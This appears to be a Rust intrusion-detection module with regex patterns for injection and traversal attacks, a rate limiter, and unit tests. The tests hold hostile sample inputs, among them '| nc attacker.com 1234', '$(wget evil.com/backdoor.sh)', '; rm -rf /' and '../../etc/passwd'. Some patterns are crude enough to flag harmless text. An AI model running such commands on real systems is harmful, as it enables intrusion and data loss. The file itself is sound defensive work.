use super::events::{AttackPattern, EventCategory, SecurityEvent, SecuritySeverity};
use regex::Regex;
use std::collections::HashMap;
use std::sync::Arc;
use thiserror::Error;
#[derive(Debug, Error)]
pub enum DetectionError {
#[error("Pattern compilation failed: {0}")]
PatternCompilationFailed(String),
#[error("Detection failed: {0}")]
DetectionFailed(String),
}
pub struct PatternMatcher {
sql_patterns: Vec<Regex>,
xss_patterns: Vec<Regex>,
command_patterns: Vec<Regex>,
path_patterns: Vec<Regex>,
template_patterns: Vec<Regex>,
ldap_patterns: Vec<Regex>,
}
impl PatternMatcher {
pub fn new() -> Result<Self, DetectionError> {
Ok(Self {
sql_patterns: Self::compile_sql_patterns()?,
xss_patterns: Self::compile_xss_patterns()?,
command_patterns: Self::compile_command_patterns()?,
path_patterns: Self::compile_path_patterns()?,
template_patterns: Self::compile_template_patterns()?,
ldap_patterns: Self::compile_ldap_patterns()?,
})
}
pub fn detect(&self, input: &str) -> AttackPattern {
if self.is_sql_injection(input) {
return AttackPattern::SqlInjection;
}
if self.is_xss(input) {
return AttackPattern::Xss;
}
if self.is_command_injection(input) {
return AttackPattern::CommandInjection;
}
if self.is_path_traversal(input) {
return AttackPattern::PathTraversal;
}
if self.is_template_injection(input) {
return AttackPattern::TemplateInjection;
}
if self.is_ldap_injection(input) {
return AttackPattern::LdapInjection;
}
AttackPattern::None
}
fn is_sql_injection(&self, input: &str) -> bool {
let lower = input.to_lowercase();
self.sql_patterns
.iter()
.any(|pattern| pattern.is_match(&lower))
}
fn is_xss(&self, input: &str) -> bool {
let lower = input.to_lowercase();
self.xss_patterns
.iter()
.any(|pattern| pattern.is_match(&lower))
}
fn is_command_injection(&self, input: &str) -> bool {
self.command_patterns
.iter()
.any(|pattern| pattern.is_match(input))
}
fn is_path_traversal(&self, input: &str) -> bool {
self.path_patterns
.iter()
.any(|pattern| pattern.is_match(input))
}
fn is_template_injection(&self, input: &str) -> bool {
self.template_patterns
.iter()
.any(|pattern| pattern.is_match(input))
}
fn is_ldap_injection(&self, input: &str) -> bool {
self.ldap_patterns
.iter()
.any(|pattern| pattern.is_match(input))
}
fn compile_sql_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![
r"(\bor\b|\band\b).*=.*",
r"union.*select",
r"select.*from",
r"insert.*into",
r"delete.*from",
r"drop.*table",
r"update.*set",
r"--.*$",
r"/\*.*\*/",
r";\s*drop",
r"'.*or.*'.*'",
r"'.*=.*'",
r"1.*=.*1",
r"admin.*--",
];
Self::compile_patterns(&patterns)
}
fn compile_xss_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![
r"<script[^>]*>",
r"javascript:",
r"onerror\s*=",
r"onload\s*=",
r"onclick\s*=",
r"<iframe",
r"<embed",
r"<object",
r"document\.cookie",
r"window\.location",
r"eval\s*\(",
r"alert\s*\(",
];
Self::compile_patterns(&patterns)
}
fn compile_command_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![
r";\s*rm\s",
r";\s*cat\s",
r"\|\s*nc\s",
r"&&\s*wget",
r"`.*`",
r"\$\(.*\)",
r">\s*/dev/",
r"<\s*/dev/",
r";\s*curl",
r"\|\s*sh",
r"\|\s*bash",
];
Self::compile_patterns(&patterns)
}
fn compile_path_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![
r"\.\./",
r"\.\.",
r"%2e%2e",
r"\.\.\\",
r"%252e%252e",
r"..;",
];
Self::compile_patterns(&patterns)
}
fn compile_template_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![r"\{\{.*\}\}", r"\{%.*%\}", r"\$\{.*\}", r"<%.*%>"];
Self::compile_patterns(&patterns)
}
fn compile_ldap_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![
r"\*\)",
r"\(\|",
r"\(&",
r"\(objectclass=\*\)",
r"admin\)\(",
];
Self::compile_patterns(&patterns)
}
fn compile_patterns(patterns: &[&str]) -> Result<Vec<Regex>, DetectionError> {
patterns
.iter()
.map(|p| {
Regex::new(p)
.map_err(|e| DetectionError::PatternCompilationFailed(format!("{}: {}", p, e)))
})
.collect()
}
}
impl Default for PatternMatcher {
fn default() -> Self {
match Self::new() {
Ok(matcher) => matcher,
Err(e) => {
log::error!("Failed to initialize default pattern matcher: {}", e);
Self {
sql_patterns: vec![],
xss_patterns: vec![],
command_patterns: vec![],
path_patterns: vec![],
template_patterns: vec![],
ldap_patterns: vec![],
}
}
}
}
}
pub struct RateLimiter {
counters: HashMap<String, RequestCounter>,
max_requests: usize,
window_secs: u64,
}
#[derive(Debug, Clone)]
struct RequestCounter {
count: usize,
window_start: i64,
}
impl RateLimiter {
pub fn new(max_requests: usize, window_secs: u64) -> Self {
Self {
counters: HashMap::new(),
max_requests,
window_secs,
}
}
pub fn check(&mut self, source: &str) -> bool {
use chrono::Utc;
let now = Utc::now().timestamp();
let counter = self
.counters
.entry(source.to_string())
.or_insert(RequestCounter {
count: 0,
window_start: now,
});
if now - counter.window_start >= self.window_secs as i64 {
counter.count = 0;
counter.window_start = now;
}
counter.count += 1;
counter.count <= self.max_requests
}
pub fn is_limited(&self, source: &str) -> bool {
use chrono::Utc;
let now = Utc::now().timestamp();
if let Some(counter) = self.counters.get(source) {
if now - counter.window_start < self.window_secs as i64 {
return counter.count > self.max_requests;
}
}
false
}
pub fn get_count(&self, source: &str) -> usize {
use chrono::Utc;
let now = Utc::now().timestamp();
self.counters
.get(source)
.filter(|c| now - c.window_start < self.window_secs as i64)
.map(|c| c.count)
.unwrap_or(0)
}
pub fn reset(&mut self, source: &str) {
self.counters.remove(source);
}
pub fn clear(&mut self) {
self.counters.clear();
}
}
pub struct IntrusionDetector {
pattern_matcher: Arc<PatternMatcher>,
auth_limiter: RateLimiter,
request_limiter: RateLimiter,
}
impl IntrusionDetector {
pub fn new() -> Result<Self, DetectionError> {
Ok(Self {
pattern_matcher: Arc::new(PatternMatcher::new()?),
auth_limiter: RateLimiter::new(5, 300), request_limiter: RateLimiter::new(100, 60), })
}
pub fn analyze_input(&self, input: &str) -> Option<SecurityEvent> {
let pattern = self.pattern_matcher.detect(input);
if !matches!(pattern, AttackPattern::None) {
Some(SecurityEvent::input_validation_failed(input, pattern))
} else {
None
}
}
pub fn check_auth_rate(&mut self, source: &str) -> Option<SecurityEvent> {
if !self.auth_limiter.check(source) {
Some(
SecurityEvent::new(
SecuritySeverity::High,
EventCategory::Authentication,
format!("Authentication rate limit exceeded for {}", source),
)
.with_attack_pattern(AttackPattern::BruteForce)
.with_metadata("source", source)
.with_metadata("limit_type", "authentication")
.with_success(false),
)
} else {
None
}
}
pub fn check_request_rate(&mut self, source: &str) -> Option<SecurityEvent> {
if !self.request_limiter.check(source) {
Some(
SecurityEvent::new(
SecuritySeverity::Medium,
EventCategory::Network,
format!("Request rate limit exceeded for {}", source),
)
.with_attack_pattern(AttackPattern::DenialOfService)
.with_metadata("source", source)
.with_metadata("limit_type", "request")
.with_success(false),
)
} else {
None
}
}
pub fn get_auth_attempts(&self, source: &str) -> usize {
self.auth_limiter.get_count(source)
}
pub fn reset_auth_attempts(&mut self, source: &str) {
self.auth_limiter.reset(source);
}
}
impl Default for IntrusionDetector {
fn default() -> Self {
match Self::new() {
Ok(detector) => detector,
Err(e) => {
log::error!("Failed to initialize default intrusion detector: {}", e);
Self {
pattern_matcher: Arc::new(PatternMatcher::default()),
auth_limiter: RateLimiter::new(100, 60),
request_limiter: RateLimiter::new(1000, 60),
}
}
}
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_sql_injection_detection() {
let matcher = PatternMatcher::new().unwrap();
assert_eq!(
matcher.detect("SELECT * FROM users"),
AttackPattern::SqlInjection
);
assert_eq!(
matcher.detect("admin' OR '1'='1"),
AttackPattern::SqlInjection
);
assert_eq!(
matcher.detect("1 UNION SELECT password FROM users"),
AttackPattern::SqlInjection
);
assert_eq!(matcher.detect("normal text"), AttackPattern::None);
}
#[test]
fn test_xss_detection() {
let matcher = PatternMatcher::new().unwrap();
assert_eq!(
matcher.detect("<script>alert('XSS')</script>"),
AttackPattern::Xss
);
assert_eq!(matcher.detect("javascript:alert(1)"), AttackPattern::Xss);
assert_eq!(
matcher.detect("<img src=x onerror=alert(1)>"),
AttackPattern::Xss
);
}
#[test]
fn test_command_injection_detection() {
let matcher = PatternMatcher::new().unwrap();
assert_eq!(
matcher.detect("; rm -rf /"),
AttackPattern::CommandInjection
);
assert_eq!(
matcher.detect("| nc attacker.com 1234"),
AttackPattern::CommandInjection
);
assert_eq!(
matcher.detect("$(wget evil.com/backdoor.sh)"),
AttackPattern::CommandInjection
);
}
#[test]
fn test_path_traversal_detection() {
let matcher = PatternMatcher::new().unwrap();
assert_eq!(
matcher.detect("../../etc/passwd"),
AttackPattern::PathTraversal
);
assert_eq!(
matcher.detect("..\\..\\windows\\system32"),
AttackPattern::PathTraversal
);
assert_eq!(
matcher.detect("%2e%2e/etc/shadow"),
AttackPattern::PathTraversal
);
}
#[test]
fn test_template_injection_detection() {
let matcher = PatternMatcher::new().unwrap();
assert_eq!(matcher.detect("{{7*7}}"), AttackPattern::TemplateInjection);
assert_eq!(
matcher.detect("${system('whoami')}"),
AttackPattern::TemplateInjection
);
}
#[test]
fn test_rate_limiter_basic() {
let mut limiter = RateLimiter::new(3, 60);
assert!(limiter.check("user1"));
assert!(limiter.check("user1"));
assert!(limiter.check("user1"));
assert!(!limiter.check("user1")); }
#[test]
fn test_rate_limiter_different_sources() {
let mut limiter = RateLimiter::new(2, 60);
assert!(limiter.check("user1"));
assert!(limiter.check("user1"));
assert!(!limiter.check("user1"));
assert!(limiter.check("user2"));
assert!(limiter.check("user2"));
assert!(!limiter.check("user2"));
}
#[test]
fn test_rate_limiter_is_limited() {
let mut limiter = RateLimiter::new(2, 60);
limiter.check("user1");
limiter.check("user1");
limiter.check("user1");
assert!(limiter.is_limited("user1"));
assert!(!limiter.is_limited("user2"));
}
#[test]
fn test_rate_limiter_get_count() {
let mut limiter = RateLimiter::new(5, 60);
limiter.check("user1");
limiter.check("user1");
limiter.check("user1");
assert_eq!(limiter.get_count("user1"), 3);
assert_eq!(limiter.get_count("user2"), 0);
}
#[test]
fn test_rate_limiter_reset() {
let mut limiter = RateLimiter::new(1, 60);
limiter.check("user1");
limiter.check("user1");
limiter.reset("user1");
assert!(!limiter.is_limited("user1"));
assert_eq!(limiter.get_count("user1"), 0);
}
#[test]
fn test_intrusion_detector_analyze_input() {
let detector = IntrusionDetector::new().unwrap();
let event1 = detector.analyze_input("SELECT * FROM users");
let event2 = detector.analyze_input("normal text");
assert!(event1.is_some());
assert_eq!(event1.unwrap().attack_pattern, AttackPattern::SqlInjection);
assert!(event2.is_none());
}
#[test]
fn test_intrusion_detector_auth_rate() {
let mut detector = IntrusionDetector::new().unwrap();
for _ in 0..5 {
detector.check_auth_rate("192.168.1.1");
}
let event = detector.check_auth_rate("192.168.1.1");
assert!(event.is_some());
let evt = event.unwrap();
assert_eq!(evt.severity, SecuritySeverity::High);
assert_eq!(evt.attack_pattern, AttackPattern::BruteForce);
}
#[test]
fn test_intrusion_detector_request_rate() {
let mut detector = IntrusionDetector::new().unwrap();
for _ in 0..100 {
detector.check_request_rate("10.0.0.1");
}
let event = detector.check_request_rate("10.0.0.1");
assert!(event.is_some());
let evt = event.unwrap();
assert_eq!(evt.severity, SecuritySeverity::Medium);
assert_eq!(evt.attack_pattern, AttackPattern::DenialOfService);
}
}